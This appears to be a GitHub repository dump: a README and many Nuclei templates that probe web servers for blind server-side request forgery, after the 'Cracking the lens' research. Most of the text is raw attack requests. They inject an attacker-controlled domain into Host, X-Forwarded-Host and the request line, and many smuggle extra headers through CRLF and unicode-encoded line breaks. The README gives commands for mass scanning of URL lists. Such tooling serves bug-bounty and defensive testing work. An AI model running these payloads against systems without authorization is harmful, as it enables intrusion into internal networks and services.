├── 1.jpg
├── 2.jpg
├── 3.jpg
├── 4.jpg
├── 5.jpg
├── 6.jpg
├── README.md
└── Templates
    ├── BlindSSRF-1.yaml
    ├── BlindSSRF-10.yaml
    ├── BlindSSRF-100.yaml
    ├── BlindSSRF-101.yaml
    ├── BlindSSRF-102.yaml
    ├── BlindSSRF-103.yaml
    ├── BlindSSRF-104.yaml
    ├── BlindSSRF-105.yaml
    ├── BlindSSRF-106.yaml
    ├── BlindSSRF-107.yaml
    ├── BlindSSRF-108.yaml
    ├── BlindSSRF-109.yaml
    ├── BlindSSRF-11.yaml
    ├── BlindSSRF-110.yaml
    ├── BlindSSRF-111.yaml
    ├── BlindSSRF-112.yaml
    ├── BlindSSRF-113.yaml
    ├── BlindSSRF-114.yaml
    ├── BlindSSRF-115.yaml
    ├── BlindSSRF-116.yaml
    ├── BlindSSRF-117.yaml
    ├── BlindSSRF-118.yaml
    ├── BlindSSRF-119.yaml
    ├── BlindSSRF-12.yaml
    ├── BlindSSRF-120.yaml
    ├── BlindSSRF-121.yaml
    ├── BlindSSRF-122.yaml
    ├── BlindSSRF-123.yaml
    ├── BlindSSRF-124.yaml
    ├── BlindSSRF-125.yaml
    ├── BlindSSRF-126.yaml
    ├── BlindSSRF-127.yaml
    ├── BlindSSRF-128.yaml
    ├── BlindSSRF-129.yaml
    ├── BlindSSRF-13.yaml
    ├── BlindSSRF-130.yaml
    ├── BlindSSRF-131.yaml
    ├── BlindSSRF-132.yaml
    ├── BlindSSRF-133.yaml
    ├── BlindSSRF-134.yaml
    ├── BlindSSRF-135.yaml
    ├── BlindSSRF-136.yaml
    ├── BlindSSRF-137.yaml
    ├── BlindSSRF-138.yaml
    ├── BlindSSRF-139.yaml
    ├── BlindSSRF-14.yaml
    ├── BlindSSRF-140.yaml
    ├── BlindSSRF-141.yaml
    ├── BlindSSRF-142.yaml
    ├── BlindSSRF-143.yaml
    ├── BlindSSRF-15.yaml
    ├── BlindSSRF-16.yaml
    ├── BlindSSRF-17.yaml
    ├── BlindSSRF-18.yaml
    ├── BlindSSRF-19.yaml
    ├── BlindSSRF-2.yaml
    ├── BlindSSRF-20.yaml
    ├── BlindSSRF-21.yaml
    ├── BlindSSRF-22.yaml
    ├── BlindSSRF-23.yaml
    ├── BlindSSRF-24.yaml
    ├── BlindSSRF-25.yaml
    ├── BlindSSRF-26.yaml
    ├── BlindSSRF-27.yaml
    ├── BlindSSRF-28.yaml
    ├── BlindSSRF-29.yaml
    ├── BlindSSRF-3.yaml
    ├── BlindSSRF-30.yaml
    ├── BlindSSRF-31.yaml
    ├── BlindSSRF-32.yaml
    ├── BlindSSRF-33.yaml
    ├── BlindSSRF-34.yaml
    ├── BlindSSRF-35.yaml
    ├── BlindSSRF-36.yaml
    ├── BlindSSRF-37.yaml
    ├── BlindSSRF-38.yaml
    ├── BlindSSRF-39.yaml
    ├── BlindSSRF-4.yaml
    ├── BlindSSRF-40.yaml
    ├── BlindSSRF-41.yaml
    ├── BlindSSRF-42.yaml
    ├── BlindSSRF-43.yaml
    ├── BlindSSRF-44.yaml
    ├── BlindSSRF-45.yaml
    ├── BlindSSRF-46.yaml
    ├── BlindSSRF-47.yaml
    ├── BlindSSRF-48.yaml
    ├── BlindSSRF-49.yaml
    ├── BlindSSRF-5.yaml
    ├── BlindSSRF-50.yaml
    ├── BlindSSRF-51.yaml
    ├── BlindSSRF-52.yaml
    ├── BlindSSRF-53.yaml
    ├── BlindSSRF-54.yaml
    ├── BlindSSRF-55.yaml
    ├── BlindSSRF-56.yaml
    ├── BlindSSRF-57.yaml
    ├── BlindSSRF-58.yaml
    ├── BlindSSRF-59.yaml
    ├── BlindSSRF-6.yaml
    ├── BlindSSRF-60.yaml
    ├── BlindSSRF-61.yaml
    ├── BlindSSRF-62.yaml
    ├── BlindSSRF-63.yaml
    ├── BlindSSRF-64.yaml
    ├── BlindSSRF-65.yaml
    ├── BlindSSRF-66.yaml
    ├── BlindSSRF-67.yaml
    ├── BlindSSRF-68.yaml
    ├── BlindSSRF-69.yaml
    ├── BlindSSRF-7.yaml
    ├── BlindSSRF-70.yaml
    ├── BlindSSRF-71.yaml
    ├── BlindSSRF-72.yaml
    ├── BlindSSRF-73.yaml
    ├── BlindSSRF-74.yaml
    ├── BlindSSRF-75.yaml
    ├── BlindSSRF-76.yaml
    ├── BlindSSRF-77.yaml
    ├── BlindSSRF-78.yaml
    ├── BlindSSRF-79.yaml
    ├── BlindSSRF-8.yaml
    ├── BlindSSRF-80.yaml
    ├── BlindSSRF-81.yaml
    ├── BlindSSRF-82.yaml
    ├── BlindSSRF-83.yaml
    ├── BlindSSRF-84.yaml
    ├── BlindSSRF-85.yaml
    ├── BlindSSRF-86.yaml
    ├── BlindSSRF-87.yaml
    ├── BlindSSRF-88.yaml
    ├── BlindSSRF-89.yaml
    ├── BlindSSRF-9.yaml
    ├── BlindSSRF-90.yaml
    ├── BlindSSRF-91.yaml
    ├── BlindSSRF-92.yaml
    ├── BlindSSRF-93.yaml
    ├── BlindSSRF-94.yaml
    ├── BlindSSRF-95.yaml
    ├── BlindSSRF-96.yaml
    ├── BlindSSRF-97.yaml
    ├── BlindSSRF-98.yaml
    └── BlindSSRF-99.yaml

/1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xAwali/Blind-SSRF/db74e93dc910e87b16721ab6bd436f34ceee48a2/1.jpg
--------------------------------------------------------------------------------
/2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xAwali/Blind-SSRF/db74e93dc910e87b16721ab6bd436f34ceee48a2/2.jpg
--------------------------------------------------------------------------------
/3.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xAwali/Blind-SSRF/db74e93dc910e87b16721ab6bd436f34ceee48a2/3.jpg
--------------------------------------------------------------------------------
/4.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xAwali/Blind-SSRF/db74e93dc910e87b16721ab6bd436f34ceee48a2/4.jpg
--------------------------------------------------------------------------------
/5.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xAwali/Blind-SSRF/db74e93dc910e87b16721ab6bd436f34ceee48a2/5.jpg
--------------------------------------------------------------------------------
/6.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xAwali/Blind-SSRF/db74e93dc910e87b16721ab6bd436f34ceee48a2/6.jpg
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------

Nuclei Templates to reproduce Cracking the lens's Research

Requirements

1 - Read and Watch !

Cracking the lens's Research

2 - Install Nuclei

Nuclei

3 - Clone this Repository

Blind SSRF

Usage

```sh
sed -i -- 's/- "Your Match"/- "Match Response of Your Domain e.g. Title My Server 0xAwali<\/title>"/' *.yaml
```

```sh
nuclei -c 300 -list url.txt -bulk-size 50 -retries 3 -timeout 20 -t "/Templates/*.yaml" -var "MY-DOMAIN=domain.com"
```

<h1 align="center">Keep in Your Mind</h1>
<h4 align="center">Don't use {{interactsh-url}}, because I noticed that a lot of interactions take time to happen, so you will miss a lot</h4>

<h1 align="center">Next Step !</h1>
<h4 align="center">If nuclei matched something, you now have a complete SSRF</h4>
<h4 align="center">If nuclei didn't match anything but an HTTP interaction happened, you may have a blind SSRF</h4>
<h4 align="center">So invest some time and use this blog as a reference</h4>

<h4 align="center">
  <img src="https://assetnote.io/images/global/assetnote-logo-centred.svg" width="200px" alt="assetnote">
</h4>

<h4 align="center">
  <a href="https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/">A Glossary of Blind SSRF Chains</a>
</h4>
<p align="center">
  <a href="https://twitter.com/assetnote"><img src="https://img.shields.io/twitter/follow/assetnote?style=social"></a>
</p>

<h1 align="center">Results</h1>
<h3 align="center">1 - Complete SSRF</h3>

```sh
GET http://internal-domains.company.com/ HTTP/1.1
Host: company.com
Cache-Control: no-transform
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept-Encoding: gzip, deflate
Accept: */*
```

<h3 align="center">
  <img src="1.jpg" alt="SSRF" width="700px">
</h3>

<h3 align="center">
  <img src="2.jpg" alt="SSRF" width="700px">
</h3>

<h3 align="center">
  <img src="3.jpg" alt="SSRF" width="700px">
</h3>

<h3 align="center">
  <img src="4.jpg" alt="SSRF" width="700px">
</h3>

```sh
GET http://internal-domains.company.com/ HTTP/1.0
Cache-Control: no-transform
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept-Encoding: gzip, deflate
Accept: */*
```

<h3 align="center">2 - Blind SSRF, but no luck hitting internal services</h3>

```sh
GET / HTTP/1.1
Host: company.com @MY-Domain #did you notice that there is a space between company.com and @
Cache-Control: no-transform
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept-Encoding: gzip, deflate
Accept: */*
```

<h3 align="center">
  <img src="5.jpg" alt="SSRF" width="700px">
</h3>

<h3 align="center">
  <img src="6.jpg" alt="SSRF" width="700px">
</h3>

```sh
GET / HTTP/1.1
Host: company.com
X-Forwarded-Host: MY-Domain/.company.com
Cache-Control: no-transform
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept-Encoding: gzip, deflate
Accept: */*
```

--------------------------------------------------------------------------------
/Templates/BlindSSRF-1.yaml:
--------------------------------------------------------------------------------
id: 0x001

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Host}}.{{Port}}.BSSRF-001.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-10.yaml:
--------------------------------------------------------------------------------
id: 0x010

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET / HTTP/1.1
        Host: {{Hostname}}
        Host: {{Host}}.{{Port}}.BSSRF-010.{{MY-DOMAIN}}
        Cache-Control: no-transform
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-100.yaml:
--------------------------------------------------------------------------------
id: 0100

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET /%20HTTP/1.1%0d%0aX-Forwarded-Host:%20{{Host}}.{{Port}}.BSSRF-100.{{MY-DOMAIN}}%0d%0a%0d%0a HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-101.yaml:
--------------------------------------------------------------------------------
id: 0x101

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET /%20HTTP/1.1%E5%98%8D%E5%98%8AX-Forwarded-Host:%20{{Host}}.{{Port}}.BSSRF-101.{{MY-DOMAIN}}%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-102.yaml:
--------------------------------------------------------------------------------
id: 0x102

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET /%20HTTP/1.1%0DX-Forwarded-Host:%20{{Host}}.{{Port}}.BSSRF-102.{{MY-DOMAIN}}%0D%0D HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-103.yaml:
--------------------------------------------------------------------------------
id: 0x103

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET /%20HTTP/1.1%0AX-Forwarded-Host:%20{{Host}}.{{Port}}.BSSRF-103.{{MY-DOMAIN}}%0A%0A HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: no-transform
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-104.yaml:
--------------------------------------------------------------------------------
id: 0x104

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET /%20HTTP/1.1%3F%0DX-Forwarded-Host:%20{{Host}}.{{Port}}.BSSRF-104.{{MY-DOMAIN}}%3F%0D%3F%0D HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: no-transform
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-105.yaml:
--------------------------------------------------------------------------------
id: 0x105

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET /%20HTTP/1.10x0D0x0ADX-Forwarded-Host:%20{{Host}}.{{Port}}.BSSRF-105.{{MY-DOMAIN}}0x0D0x0A0x0D0x0A HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-106.yaml:
--------------------------------------------------------------------------------
id: 0x106

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET /%20HTTP/1.1\u560d\u560aX-Forwarded-Host:%20{{Host}}.{{Port}}.BSSRF-106.{{MY-DOMAIN}}\u560d\u560a\u560d\u560a HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: no-transform
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-107.yaml:
--------------------------------------------------------------------------------
id: 0x107

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET /%20HTTP/1.1%0d%0aX-Host:%20{{Host}}.{{Port}}.BSSRF-107.{{MY-DOMAIN}}%0d%0a%0d%0a HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: no-transform
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-108.yaml:
--------------------------------------------------------------------------------
id: 0x108

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET /%20HTTP/1.1%E5%98%8D%E5%98%8AX-Host:%20{{Host}}.{{Port}}.BSSRF-108.{{MY-DOMAIN}}%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: no-transform
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-109.yaml:
--------------------------------------------------------------------------------
id: 0x109

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET /%20HTTP/1.1%0DX-Host:%20{{Host}}.{{Port}}.BSSRF-109.{{MY-DOMAIN}}%0D%0D HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: no-transform
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-11.yaml:
--------------------------------------------------------------------------------
id: 0x011

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Host}}.{{Port}}.BSSRF-011.{{MY-DOMAIN}}
        X-Forwarded-Host: {{Host}}.{{Port}}.BSSRF-011.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-110.yaml:
--------------------------------------------------------------------------------
id: 0x110

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET /%20HTTP/1.1%0AX-Host:%20{{Host}}.{{Port}}.BSSRF-110.{{MY-DOMAIN}}%0A%0A HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: no-transform
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-111.yaml:
--------------------------------------------------------------------------------
id: 0x111

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET /%20HTTP/1.1%3F%0DX-Host:%20{{Host}}.{{Port}}.BSSRF-111.{{MY-DOMAIN}}%3F%0D%3F%0D HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: no-transform
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-112.yaml:
--------------------------------------------------------------------------------
id: 0x112

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET /%20HTTP/1.10x0D0x0ADX-Host:%20{{Host}}.{{Port}}.BSSRF-112.{{MY-DOMAIN}}0x0D0x0A0x0D0x0A HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: no-transform
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-113.yaml:
--------------------------------------------------------------------------------
id: 0x113

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET /%20HTTP/1.1\u560d\u560aX-Host:%20{{Host}}.{{Port}}.BSSRF-113.{{MY-DOMAIN}}\u560d\u560a\u560d\u560a HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: no-transform
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-114.yaml:
--------------------------------------------------------------------------------
id: 0x114

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET / HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0\r\nHost: {{Host}}.{{Port}}.BSSRF-114.{{MY-DOMAIN}}
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*
        Host: {{Hostname}}

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-115.yaml:
--------------------------------------------------------------------------------
id: 0x115

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET / HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0\nHost: {{Host}}.{{Port}}.BSSRF-115.{{MY-DOMAIN}}
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*
        Host: {{Hostname}}

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-116.yaml:
--------------------------------------------------------------------------------
id: 0x116

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET / HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0%0d%0aHost: {{Host}}.{{Port}}.BSSRF-116.{{MY-DOMAIN}}
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*
        Host: {{Hostname}}

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-117.yaml:
--------------------------------------------------------------------------------
id: 0x117

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET / HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0%0aHost: {{Host}}.{{Port}}.BSSRF-117.{{MY-DOMAIN}}
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*
        Host: {{Hostname}}

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-118.yaml:
--------------------------------------------------------------------------------
id: 0x118

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET / HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0%0dHost: {{Host}}.{{Port}}.BSSRF-118.{{MY-DOMAIN}}
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*
        Host: {{Hostname}}

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-119.yaml:
--------------------------------------------------------------------------------
id: 0x119

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET / HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0\rHost: {{Host}}.{{Port}}.BSSRF-119.{{MY-DOMAIN}}
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*
        Host: {{Hostname}}

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-12.yaml:
--------------------------------------------------------------------------------
id: 0x012

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Host}}.{{Port}}.BSSRF-012.{{MY-DOMAIN}}
        X-Forwarded-Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-120.yaml:
--------------------------------------------------------------------------------
id: 0x120

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET / HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0\x0d\x0aHost: {{Host}}.{{Port}}.BSSRF-120.{{MY-DOMAIN}}
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*
        Host: {{Hostname}}

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-121.yaml:
--------------------------------------------------------------------------------
id: 0x121

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET / HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0%E5%98%8A%E5%98%8DHost: {{Host}}.{{Port}}.BSSRF-121.{{MY-DOMAIN}}
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*
        Host: {{Hostname}}

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-122.yaml:
--------------------------------------------------------------------------------
id: 0x122

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET / HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0\u560d\u560aHost: {{Host}}.{{Port}}.BSSRF-122.{{MY-DOMAIN}}
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*
        Host: {{Hostname}}

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-123.yaml:
--------------------------------------------------------------------------------
id: 0x123

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET / HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0%3F%0AHost: {{Host}}.{{Port}}.BSSRF-123.{{MY-DOMAIN}}
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*
        Host: {{Hostname}}

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-124.yaml:
--------------------------------------------------------------------------------
id: 0x124

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET / HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0%23%0AHost: {{Host}}.{{Port}}.BSSRF-124.{{MY-DOMAIN}}
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*
        Host: {{Hostname}}

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-125.yaml:
--------------------------------------------------------------------------------
id: 0x125

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET @{{Host}}.{{Port}}.BSSRF-125.{{MY-DOMAIN}}/ HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: no-transform
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-126.yaml:
--------------------------------------------------------------------------------
id: 0x126

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET http://{{Host}}.{{Port}}.BSSRF-126.{{MY-DOMAIN}}/ HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: no-transform
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-127.yaml:
--------------------------------------------------------------------------------
id: 0x127

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET {{Scheme}}://{{Host}}.{{Port}}.BSSRF-127.{{MY-DOMAIN}}/ HTTP/0.9
        Cache-Control: no-transform
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-128.yaml:
--------------------------------------------------------------------------------
id: 0x128

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET :@{{Host}}.{{Port}}.BSSRF-128.{{MY-DOMAIN}}/ HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: no-transform
